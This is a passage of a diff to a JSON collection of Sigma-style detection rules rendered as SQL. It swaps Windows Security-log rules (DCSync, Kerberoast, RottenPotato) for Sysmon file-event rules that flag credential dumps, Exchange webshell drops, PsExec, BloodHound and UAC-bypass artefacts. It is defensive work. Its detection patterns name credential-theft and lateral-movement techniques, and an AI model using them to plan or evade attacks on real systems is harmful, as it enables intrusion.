'\\') OR (ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_update.yml" + "filename": "file_event_win_office_macro_files_from_susp_process.yml" }, { - "title": "KrbRelayUp Attack Pattern", - "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "title": "Suspicious DotNET CLR Usage Log Artifact", + "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", "status": "experimental", - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", + "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" ], - "filename": "win_security_susp_krbrelayup.yml" + "filename": "file_event_win_net_cli_artefact.yml" }, { - "title": "RottenPotato Like Attack Pattern", - "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", + "title": "QuarksPwDump Dump File", + "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", "status": "test", - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects a dump file written by QuarksPwDump password dumper", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.credential_access", - "attack.t1557.001" + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" ], - "filename": "win_security_susp_rottenpotato.yml" + "filename": "file_event_win_hktl_quarkspw_filedump.yml" }, { - "title": "Windows Defender Exclusion Set", - "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "title": "CVE-2021-26858 Exchange Exploitation", + "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", "status": "test", - "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", - "author": "@BarryShooshooga", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.t1203", + "attack.execution", + "cve.2021.26858" ], "falsepositives": [ - "Intended inclusions by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" ], - "filename": "win_security_defender_bypass.yml" + "filename": "file_event_win_cve_2021_26858_msexchange.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - Security", - "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "title": "PSEXEC Remote Execution File Artefact", + "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", + "attack.lateral_movement", + "attack.privilege_escalation", "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1136.002", + "attack.t1543.003", + "attack.t1570", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_clip_services_security.yml" + "filename": "file_event_win_psexec_service_key.yml" }, { - "title": "Mimikatz DC Sync", - "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", - "status": "experimental", - "description": "Detects Mimikatz DC sync security events", - "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", + "title": "GoToAssist Temporary Installation Artefact", + "id": "5d756aee-ad3e-4306-ad95-cb1abec48de2", + "status": "test", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\LogMeInInc\\\\GoToAssist Remote Support Expert\\\\%' ESCAPE '\\')" ], - "filename": "win_security_dcsync.yml" + "filename": "file_event_win_gotoopener_artefact.yml" }, { - "title": "Weak Encryption Enabled and Kerberoast", - "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "status": "test", - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "author": "@neu5ron", + "title": "Suspicious ASPX File Drop by Exchange", + "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", + "status": "experimental", + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" ], - "filename": "win_security_alert_enable_weak_encryption.yml" + "filename": "file_event_win_exchange_webshell_drop.yml" }, { - "title": "Denied Access To Remote Desktop", - "id": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", - "status": "test", - "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", - "author": "Pushkarev Dmitry", + "title": "Suspicious File Creation In Uncommon AppData Folder", + "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "status": "experimental", + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Valid user was not added to RDP group" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4825')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_not_allowed_rdp_access.yml" + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" }, { - "title": "CVE-2023-23397 Exploitation Attempt", - "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "title": "Suspicious Executable File Creation", + "id": "74babdd6-a758-4549-9632-26535279e654", "status": "experimental", - "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", - "author": "Robert Lee @quantum_cookie", + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.initial_access", - "cve.2023.23397" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\')))" ], - "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" + "filename": "file_event_win_susp_executable_creation.yml" }, { - "title": "DPAPI Domain Master Key Backup Attempt", - "id": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", + "title": "UAC Bypass Using MSConfig Token Modification - File", + "id": "41bb431f-56d8-4691-bb56-ed34e390906f", "status": "test", - "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4692')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" ], - "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml" + "filename": "file_event_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Active Directory User Backdoors", - "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "status": "test", - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "author": "@neu5ron", + "title": "Wmiexec Default Output File", + "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", + "status": "experimental", + "description": "Detects the creation of the default output filename used by the wmiexec tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1098", - "attack.persistence" + "attack.lateral_movement", + "attack.t1047" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$'))" ], - "filename": "win_security_alert_ad_user_backdoors.yml" + "filename": "file_event_win_wmiexec_default_filename.yml" }, { - "title": "SCM Database Handle Failure", - "id": "13addce7-47b2-4ca0-a98f-1de964d1d669", - "status": "experimental", - "description": "Detects non-system users failing to get a handle of the SCM database.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "New Shim Database Created in the Default Directory", + "id": "ee63c85c-6d51-4d12-ad09-04e25877a947", + "status": "test", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1010" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4656' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'ServicesActive' AND AccessMask = '0xf003f') AND NOT (SubjectLogonId = '0x3e4'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.sdb' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\apppatch\\\\Custom\\\\%' ESCAPE '\\')" ], - "filename": "win_security_scm_database_handle_failure.yml" + "filename": "file_event_win_creation_new_shim_database.yml" }, { - "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", - "id": "2c99737c-585d-4431-b61a-c911d86ff32f", + "title": "Suspicious Creation with Colorcpl", + "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", "status": "experimental", - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" ], - "filename": "win_security_account_backdoor_dcsync_rights.yml" + "filename": "file_event_win_susp_colorcpl.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Security", - "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "title": "BloodHound Collection Files", + "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "author": "C.J. May", "tags": [ - "attack.defense_evasion", - "attack.t1027", + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Some false positives may arise in some environment and this may require some tuning. Add addional filters or reduce level depending on the level of noise" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" + "filename": "file_event_win_bloodhound_collection.yml" }, { - "title": "SCM Database Privileged Operation", - "id": "dae8171c-5ec6-4396-b210-8466585b53e9", - "status": "test", - "description": "Detects non-system users performing privileged operation os the SCM database", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "CVE-2022-24527 Microsoft Connected Cache LPE", + "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "status": "experimental", + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1059.001", + "cve.2022.24527" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4674' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'servicesactive' AND PrivilegeList = 'SeTakeOwnershipPrivilege') AND NOT (SubjectLogonId = '0x3e4' AND ProcessName LIKE '%:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\'))" - ], - "filename": "win_security_scm_database_privileged_operation.yml" - }, - { - "title": "Failed Logon From Public IP", - "id": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", - "status": "test", - "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", - "author": "NVISO", - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.t1078", - "attack.t1190", - "attack.t1133" - ], - "falsepositives": [ - "Legitimate logon attempts over the internet", - "IPv4-to-IPv6 mapped IPs" - ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND NOT ((IpAddress LIKE '%-%' ESCAPE '\\') OR ((IpAddress LIKE '10.%' ESCAPE '\\' OR IpAddress LIKE '192.168.%' ESCAPE '\\' OR IpAddress LIKE '172.16.%' ESCAPE '\\' OR IpAddress LIKE '172.17.%' ESCAPE '\\' OR IpAddress LIKE '172.18.%' ESCAPE '\\' OR IpAddress LIKE '172.19.%' ESCAPE '\\' OR IpAddress LIKE '172.20.%' ESCAPE '\\' OR IpAddress LIKE '172.21.%' ESCAPE '\\' OR IpAddress LIKE '172.22.%' ESCAPE '\\' OR IpAddress LIKE '172.23.%' ESCAPE '\\' OR IpAddress LIKE '172.24.%' ESCAPE '\\' OR IpAddress LIKE '172.25.%' ESCAPE '\\' OR IpAddress LIKE '172.26.%' ESCAPE '\\' OR IpAddress LIKE '172.27.%' ESCAPE '\\' OR IpAddress LIKE '172.28.%' ESCAPE '\\' OR IpAddress LIKE '172.29.%' ESCAPE '\\' OR IpAddress LIKE '172.30.%' ESCAPE '\\' OR IpAddress LIKE '172.31.%' ESCAPE '\\' OR IpAddress LIKE '127.%' ESCAPE '\\' OR IpAddress LIKE '169.254.%' 